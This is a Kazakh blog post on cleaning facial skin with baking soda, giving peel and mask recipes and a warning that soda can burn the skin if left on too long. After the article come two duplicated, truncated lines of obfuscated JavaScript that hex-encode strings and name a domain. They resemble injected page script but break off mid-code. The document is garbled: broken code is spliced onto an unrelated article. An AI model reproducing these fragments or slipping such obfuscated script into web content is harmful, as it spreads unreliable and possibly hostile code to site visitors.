Содамен бетті тазарту әдістері

Осыдан бір жылдай бұрын ас содасы арқылы бетімді тазартқаным туралы блог жазған едім.Сайтқа орлған сітт Ақмарал есімді қолданушы құрбымнан хат келіп,содамен бетті тазарту әдісін сұрапты.Сонымен,сода-бетті қалыпқы келтіру .шін қолданылатын таптырмас зат!

Кеңес №1.Пилинг

Егер сізде бетті ;ууға арналған гель болса,шамалап алынған гельге жарты шай қасық ас содасын қосыңыз да ,бетіңізді уқалай отырып жағыңыз.Сабындатып,3-4 минуттан соң салқын сумен шайыңыз.

Кеңес №2.Маска

Егер арнайы бетке арналған құралдарыңыз болмаса, жарты шай қасық ас содасына қаймақ тәрісдес болатындай етіп жай суды қосыңыз.Қоспаны бетіңізге жағып 5-7 минут отырыңыз.

Кеңес №3. Ұн,крахмал мен содадан маска.

Негізі бұл масканың бастапқы заты глина болуы өажет,алайда косметикалық глина барлық үйден ұн мен крахмалдай орын табады деп ойламайсын,сондықтан баламалы заттарды қолданған әлдеқайда тиімді.

Аталған кеңестерді орындамас бұрын бетіңізді артық бояғыш құралдардан арылтып,тазартқаныңыз жөн.Құрамында сода бар қоспаны бетіңізге жаққан кезде 20 минуттан артық ұстауға болмайтынын ескеріңіз.Өйткені,артық қыламын деп тыртық қылып алуыңыз мүмкін.Шамадан тыс  натрий гидрокарбонатының мөлшері бет терісінің куйіп,зақымдануына әкеп соғады.Сода тек қана безеден кетіріп қоймай,майлылықты азайтады және терідегі тезіктердің мөлшерін кішірейтеді.Содамен бетті тазарту арқылы беттің терісі бірқалыпты реңкке,түске ие болады және майлы жылтырдан арылады.

Сізге көмектесті ме?

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e



Бөлісу: